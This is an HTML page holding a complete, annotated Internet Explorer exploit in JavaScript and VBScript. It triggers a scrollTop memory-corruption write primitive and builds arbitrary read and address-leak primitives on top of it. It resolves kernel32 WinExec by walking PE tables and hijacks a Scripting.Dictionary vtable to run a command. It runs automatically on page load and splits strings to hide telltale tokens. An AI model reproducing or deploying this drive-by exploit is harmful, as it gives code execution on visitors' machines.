<meta http-equiv="x-ua-compatible" content="IE=8.a">
<body>
<script language="javascript">
// Page setup for the VBScript write primitive below: a 10x9px
// overflow:scroll box (#container1) wrapping an enormous child (#content1),
// so that scrollTop on the container accepts very large values. The
// "div"/"style"/"overflow:scroll" literals are spliced from fragments so
// the plain tokens do not appear in the page source.
function makeDiv(id, css) {
    var el = document.createElement("d" + "iv");
    el.id = id;
    el.setAttribute("st" + "yle", css);
    return el;
}

var d1 = makeDiv("container1", "overflo" + "w:scr" + "oll; width: 10px; height: 9px");
var d2 = makeDiv("content1", "width:5000000px; height:4987000px");
d2.innerHTML = "Content";

// Attach child first, then the container, exactly as before.
d1.appendChild(d2);
document.body.appendChild(d1);
</script>
<script language="JavaScript">

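    // Read a NUL-terminated 8-bit string of exactly `len` characters at `addr`
    // through the readInt32 primitive (the VBScript ReadInt32 in this page;
    // IE resolves script names across engines case-insensitively — verify on
    // the target build). Returns "" unless the byte at addr+len is 0, i.e. the
    // string must be exactly `len` characters long; the PE walkers rely on
    // this for exact name comparison.
    //
    // Bytes are extracted with unsigned shifts so that a negative readInt32
    // result (the primitive yields a signed VT_I4) still gives the right
    // bytes; the original division-based extraction produced wrong upper
    // bytes for any dword with the sign bit set. Only the dwords that hold
    // the `len` characters plus the terminator are read, so the primitive
    // does not touch memory past the string (the original read about twice
    // that).
    function readString(addr, len)
    {
        var s = "";
        // ceil((len + 1) / 4) dwords cover the characters and the terminator
        var end = addr + (((len + 1) + 3) & ~3);
        for (; addr < end; addr += 4)
        {
            var v = readInt32(addr);
            s += String.fromCharCode(v & 0xff);
            s += String.fromCharCode((v >>> 8) & 0xff);
            s += String.fromCharCode((v >>> 16) & 0xff);
            s += String.fromCharCode((v >>> 24) & 0xff);
        }

        if (s.charCodeAt(len) == 0) return s.substring(0, len);

        return "";
    }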

    // Walk downwards from addr in 64 KiB steps until a page whose first dword
    // is 0x00905a4d ("MZ", 0x90, 0x00 — the usual start of a DOS header) is
    // found, and return that address as the base of the module containing
    // addr. Returns 0 if nothing matched before reaching address 0.
    // Note the bitwise mask turns addresses at or above 0x80000000 negative,
    // so those return 0 straight away; fine for 32-bit user-mode targets.
    function peBase(addr)
    {
        var probe = addr & 0xffff0000;
        while (probe > 0)
        {
            if (readInt32(probe) == 0x00905a4d) return probe;
            probe -= 0x10000;
        }
        return 0;
    }

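    // Find the base of the module named `name` (e.g. "KERNEL32.dll") that the
    // PE image at `base` imports: walk the image's import directory, and for
    // the IMAGE_IMPORT_DESCRIPTOR whose Name matches, take the second entry
    // of its import address table (FirstThunk) — a pointer into the imported
    // module once bound — and locate that module's header with peBase().
    // Assumes the IAT has at least two bound entries. Returns 0 if no
    // descriptor matches.
    //
    // DataDirectory[1].Size is in bytes; the original looped `size` times
    // over 0x14-byte descriptors and so read far past the end of the table
    // whenever the name was not found. The loop now runs once per descriptor.
    function peModule(name, base)
    {
        var peHeader = base + readInt32(base + 0x3c);            // e_lfanew
        var importSize = readInt32(peHeader + 0x84);               // DataDirectory[1].Size (bytes)
        var importTable = base + readInt32(peHeader + 0x80);      // DataDirectory[1].VirtualAddress
        var descriptorCount = Math.floor(importSize / 0x14);

        for (var i = 0; i < descriptorCount; i++)
        {
            var descriptor = importTable + i * 0x14;
            var rName = readString(base + readInt32(descriptor + 0xc), name.length);   // Name RVA
            if (rName == name)
            {
                var iat = base + readInt32(descriptor + 0x10);   // FirstThunk RVA
                return peBase(readInt32(iat + 4));               // second IAT slot points into the module
            }
        }

        return 0;
    }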

    // Resolve the export `name` of the module whose header is at `base` by
    // scanning the export directory's name table (exact match via
    // readString). Returns the function's absolute address, or 0 if no export
    // of that name exists. Forwarded exports are not handled: whatever RVA is
    // in AddressOfFunctions is returned as is.
    function peProc(name, base)
    {
        var exportDir = base + readInt32(base + readInt32(base + 0x3c) + 0x78);   // DataDirectory[0].VirtualAddress
        var nameCount = readInt32(exportDir + 0x18);              // NumberOfNames
        var functions = base + readInt32(exportDir + 0x1c);       // AddressOfFunctions
        var names = base + readInt32(exportDir + 0x20);           // AddressOfNames
        var ordinals = base + readInt32(exportDir + 0x24);        // AddressOfNameOrdinals (16-bit entries)

        for (var i = 0; i < nameCount; i++)
        {
            if (readString(base + readInt32(names + i * 4), name.length) != name) continue;

            // 32-bit read at a 16-bit slot; the low half (little-endian) is ordinals[i]
            var ordinal = readInt32(ordinals + i * 2) & 0xffff;
            return base + readInt32(functions + ordinal * 4);
        }

        return 0;
    }

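    // Resolve kernel32!funcName starting from any address inside a module
    // that imports KERNEL32.dll (the caller passes a Scripting.Dictionary's
    // vtable pointer, presumably an address inside scrrun.dll): find that
    // module's base, follow its KERNEL32.dll import to kernel32's base, then
    // look funcName up in kernel32's exports.
    //
    // Returns 0 if any stage fails. The original fed a 0 from peBase or
    // peModule straight into the next lookup as a base address (reading the
    // first page of memory); each stage is now checked. The VBScript caller
    // still does not check the result, so a 0 ends up in the fake vtable.
    function k32Func(funcName, addr)
    {
        var moduleBase = peBase(addr);
        if (moduleBase == 0) return 0;

        var k32Base = peModule("KERNEL32.dll", moduleBase);
        if (k32Base == 0) return 0;

        return peProc(funcName, k32Base);
    }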

</script>
<script language="VBScript.Encode">
' Spray: &h3000001 Variants (16 bytes each, roughly 768 MiB). The script
' assumes ar1's storage ends up covering addressOfGremlin, so that writes
' there land inside one of these VARIANTs (layout assumption, not checked).
Dim ar1(&h3000000)
' Filled with Scripting.Dictionary instances by Exploit; one of them is the
' object whose vtable gets hijacked.
Dim ar2(1000)
' ar1 index of the VARIANT that Exploit converts to VT_BYREF|VT_I4
' (&h4003); ReadInt32 and LeakAddressOfObject go through that cell.
Dim gremlin
' Hard-coded absolute address of that VARIANT; every later address in the
' script is derived from it.
addressOfGremlin = &h28281000
' Carrier object: whatever is stored through Value is what the object
' evaluates to via its default property. TriggerWrite assigns an instance to
' scrollTop so the stored number is what the setter ends up consuming.
Class MyClass
        Private m_stored
        ' Remember the value to hand back later.
        Public Property Let Value(v)
                m_stored = v
        End Property
        ' Default property: the object's value when it is coerced.
        Public Default Property Get P
                P = m_stored
        End Property
End Class
' The single write primitive. Sets scrollTop of the tiny scrolling container
' to val, then assigns a MyClass whose default property yields `where`. The
' script depends on the scrollTop setter using that object's value as the
' destination of its store (the defect itself is not visible in this file);
' judging by the callers, the store is a 32-bit one, which is why they speak
' of a 3-byte zero "trailer" after each byte they write.
Sub TriggerWrite(where, val)
        Dim container, proxy
        Set container = document.getElementById("container1")
        container.scrollTop = val
        Set proxy = New MyClass
        proxy.Value = where
        Set container.scrollTop = proxy
End Sub
' Store the 32-bit value val at addr one byte at a time, low byte first.
' Each TriggerWrite is (presumably) a 32-bit store of a value below &h100,
' so writing in ascending order leaves the four bytes correct followed by
' three zero bytes — the "trailer". The order matters: each write clobbers
' the trailer of the previous one.
Sub WriteInt32With3ByteZeroTrailer(addr, val)
        Dim k, divisors
        divisors = Array(1, &h100, &h10000, &h1000000)
        For k = 0 To 3
                TriggerWrite addr + k, (val \ divisors(k)) AND &hff
        Next
End Sub
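' Write str to addr as one byte per character (Asc of each character, each
' issued as its own TriggerWrite). Nothing is written for an empty string.
' The last store leaves zero bytes after the final character, which is what
' the name refers to.
'
' The loop index is now declared locally: without Option Explicit the
' original `i` was an implicit global shared with Exploit, whose own `For i`
' loops call into the write helpers — a caller iterating with `i` would have
' had its counter clobbered.
Sub WriteAsciiStringWith4ByteZeroTrailer(addr, str)
        Dim i
        For i = 0 To Len(str) - 1
                TriggerWrite addr + i, Asc(Mid(str, i + 1, 1))
        Next
End Sub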
' Arbitrary 32-bit read. The gremlin VARIANT has been given vt = &h4003
' (VT_BYREF Or VT_I4, see Exploit), so its data field at +8 is treated as a
' pointer to a Long: overwrite that pointer with addr, then reading
' ar1(gremlin) dereferences it. The helper's 3-byte zero trailer lands in the
' unused upper half of the 16-byte VARIANT. Result is a signed Long.
Function ReadInt32(addr)
        Dim pointerField
        pointerField = addressOfGremlin + &h8
        WriteInt32With3ByteZeroTrailer pointerField, addr
        ReadInt32 = ar1(gremlin)
End Function
' Return the address of the COM object obj. Storing it in the VARIANT right
' after the gremlin cell (ar1(gremlin + 1), at addressOfGremlin + &h10) puts
' its interface pointer at that VARIANT's +8, i.e. addressOfGremlin + &h18,
' which is read back through ReadInt32. ar1 keeps a reference to obj until
' that slot is overwritten or the array is erased.
Function LeakAddressOfObject(obj)
        Dim pointerSlot
        pointerSlot = addressOfGremlin + &h18
        Set ar1(gremlin + 1) = obj
        LeakAddressOfObject = ReadInt32(pointerSlot)
End Function
' Runs the whole chain on top of TriggerWrite:
'   1. turn one of ar1's VARIANTs into a VT_BYREF|VT_I4 cell ("gremlin") so
'      ReadInt32 / LeakAddressOfObject work;
'   2. leak a Scripting.Dictionary's address and vtable and resolve WinExec
'      from the module that vtable lives in;
'   3. build a fake vtable (slot 12 -> WinExec) and a fake dictionary object
'      in the sprayed region, point a leaked slot at it and call a method;
'   4. patch neighbouring object headers so teardown does not crash.
' Every offset used here (&h3c, &h48, &h14, slot 12, the &h100 stride) is a
' hard-coded assumption about particular vbscript/scrrun builds and the heap
' layout; nothing is derived at runtime and nothing is checked.
Sub Exploit()
        ' Write &h4003 (VT_BYREF Or VT_I4) into what is assumed to be the vt
        ' field of one of ar1's VARIANTs at addressOfGremlin.
        TriggerWrite addressOfGremlin, &h4003
        ' Find that VARIANT's index: only indices congruent to the
        ' address-derived start modulo &h100 are probed (an alignment
        ' assumption about ar1's storage), and the first one that no longer
        ' reads as Empty is the cell that was hit.
        For i = ((addressOfGremlin - &h20) / &h10) Mod &h100 To UBound(ar1) Step &h100
                If Not IsEmpty(ar1(i)) Then
                        gremlin = i
                        Exit For
                End If
        Next

        If IsEmpty(gremlin) Then
                MsgBox "Could not find gremlin"
                Exit Sub
        End If

        ' Allocate many dictionaries; the cleanup at the end assumes some of
        ' them sit &h48 bytes apart after the one picked below.
        For i = 0 To UBound(ar2)
                Set ar2(i) = CreateObject("Scripting.Dictionary")
        Next

        ' Take the middle one, leak its address and vtable pointer, and resolve
        ' WinExec through the import table of the module owning that vtable.
        ' winExec is not checked; a 0 here ends up in the fake vtable.
        Set dict = ar2(UBound(ar2) / 2)
        addressOfDict = LeakAddressOfObject(dict)
        vtableOfDict = ReadInt32(addressOfDict)
        winExec = k32Func("WinExec", vtableofDict)

        ' Exercise the dictionary once before its internal state is copied;
        ' why exactly these three calls are needed is not shown here.
        dict.CompareMode = vbTextCompare
        dict.Add "Pastrami", "Great"
        dict.Exists "test"

        ' Copy the first three dwords behind the pointer at +&h3c of the real
        ' object to &h20202020 — which is also what four bytes of the 0x20
        ' filler written into the fake object below read as.
        pld = ReadInt32(addressOfDict + &h3c)
        fakePld = &h20202020
        For i = 0 To 3 - 1
                WriteInt32With3ByteZeroTrailer fakePld + 4 * i, ReadInt32(pld + 4 * i)
        Next

        ' Clone the real vtable (22 slots) to &h28282828, swapping slot 12
        ' for WinExec. &h28282828 is what the "((((" below decodes to, so
        ' the fake object's first dword points at this copy.
        fakeVtable = &h28282828
        For i = 0 To 21
                If i = 12 Then
                        fptr = winExec
                Else
                        fptr = ReadInt32(vtableOfDict + 4 * i)
                End If
                WriteInt32With3ByteZeroTrailer (fakeVtable + 4 * i), fptr
        Next

        ' Fake object image, &h1000 past the gremlin: vtable pointer ("((((")
        ' first, &h3c bytes of mostly 0x20 filler, the fakePld pointer at
        ' +&h3c and a path-like string at +&h40. Presumably the filler and
        ' that string are what WinExec sees as its command line once slot 12
        ' is invoked with this object as `this`; not verifiable from here.
        fakeaddressOfDict = addressOfGremlin + &h1000

	WriteAsciiStringWith4ByteZeroTrailer fakeaddressOfDict, "((((             \..[                                       "
        WriteInt32With3ByteZeroTrailer fakeaddressOfDict + &h3c, fakePld
	WriteAsciiStringWith4ByteZeroTrailer fakeaddressOfDict + &h40, "\..\splwow64"
        ' Repoint ar1(gremlin + 1) (the slot LeakAddressOfObject used) at the
        ' fake object.
        WriteInt32With3ByteZeroTrailer addressOfGremlin + &h18, fakeaddressOfDict

        ' Call a method on the fake object -> fake vtable slot 12 -> WinExec.
        ' Any error from the hijacked call (and from everything after it) is
        ' swallowed.
        On Error Resume Next
        ar1(gremlin + 1).Exists "test"

        ' Cleanup: restore the vtable pointer and set the dword at +&h14
        ' (presumably a reference count) on the three objects assumed to
        ' follow dict at &h48-byte intervals, so releasing ar2 does not
        ' crash on damaged headers. Erase on the non-array dict likely
        ' raises, which On Error Resume Next hides.
        For i = 1 To 3
                WriteInt32With3ByteZeroTrailer addressOfDict + &h48 * i, vtableOfDict
                WriteInt32With3ByteZeroTrailer addressOfDict + (&h48 * i) + &h14, 2
        Next
        Erase Dict
        Erase ar2
End Sub
' Entry point: runs as soon as the VBScript block is parsed, i.e. right
' after the JavaScript above has created #container1.
Call Exploit
</script>
</body>